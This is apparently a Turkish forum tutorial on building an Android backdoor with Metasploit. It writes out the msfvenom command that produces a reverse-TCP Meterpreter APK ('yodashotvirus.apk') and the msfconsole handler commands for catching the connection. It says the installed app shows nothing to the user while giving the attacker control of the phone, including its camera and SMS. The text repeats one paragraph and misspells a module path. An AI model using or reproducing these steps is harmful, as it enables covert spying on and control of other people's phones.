Met𝓐sploit ile android backdoor
Öncelikle linux tabanlı işletim sistemimize geçiyoruz ben ubuntu 16.04 kullancağım.
Ardından cihazımıza "Met𝓐sploit-Framework" Kuruyoruz bunu başka bir konuda anlatacağım.
Sıra Geldi Payloadımızı Oluşturmaya
Kod:
[CENTER][SIZE="4"]msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip adresiniz] LPORT=[dinlenicek portunuz] --platform android > yodashotvirus.apk[/SIZE]
[/CENTER]
İle Payloadımızı oluşturuyoruz
Gelelim Kullandığımız Parametrelerin Anlamına
-p ile payloadımız olan android/meterpreter/reverse_tcp yi belirttik
LHOST ile dinlenicek ip LPORT ile dinlenicek portu belirttik
--platform ile platformumuz olan androidi belirttik --platform olarak kullanmamızın sebebi -p nin payload belirtmek için kullanılmasıdır
-a ile arch ve -f ile format belirtmememin sebebi androidde windowsa göre biraz daha karışık olmasıdır baside indirgedim
> ile dosya adını belirledik direk dosya adı kullanıldığı zaman olduğunuz klasöre çıkartır payloadı
-p ile payloadımız olan android/meterpreter/reverse_tcp yi belirttik
LHOST ile dinlenicek ip LPORT ile dinlenicek portu belirttik
--platform ile platformumuz olan androidi belirttik --platform olarak kullanmamızın sebebi -p nin payload belirtmek için kullanılmasıdır
-a ile arch ve -f ile format belirtmememin sebebi androidde windowsa göre biraz daha karışık olmasıdır baside indirgedim
> ile dosya adını belirledik direk dosya adı kullanıldığı zaman olduğunuz klasöre çıkartır payloadı
Payloadımız Hazır Diğer Adıma Geçebiliriz
Ardından
komutuyla Met𝓐sploit-Framework konsolu açıyoruz
use explot/multi/handler ile exploitimizi seçiyoruz
set payload android/meterpreter/reverse_tcp ile payloadımızı belirliyoruz
set LHOST [payloadı oluştururken kullandığımız ip] ile lhostu belirliyoruz
set LPORT [payloadı oluştururken kullandığımız PORT] ile lportu belirliyoruz
Kod:
msfconsole
use explot/multi/handler ile exploitimizi seçiyoruz
set payload android/meterpreter/reverse_tcp ile payloadımızı belirliyoruz
set LHOST [payloadı oluştururken kullandığımız ip] ile lhostu belirliyoruz
set LPORT [payloadı oluştururken kullandığımız PORT] ile lportu belirliyoruz
show options diyerek ayarlara bakabiliriz
exploit diyerek dinlemeye başlıyoruz
apk dosyamızı android cihazımıza atıp kurulumunu yapıyoruz daha sonra kurulan programı açıyoruz programın üzerine
tıklandığı zaman herhangibirşey açılmayacaktır fakat met𝓐sploit-Framework konsoluna baktığımız zaman cihazın geldiğini görüyoruz
Artık Cihaza Erişimimiz var kamerasından fotoğraf çekmekten onun numarasından başkasına
sms göndermeye kadar herşey yapılabilir
kullanabileceğiniz komutları görmeniz için help yazmanız yeterlidir
Konum Bukadardı Yaşadığınız Sıkıntıları Aşşağıda Belirtebilirsiniz
Son düzenleme: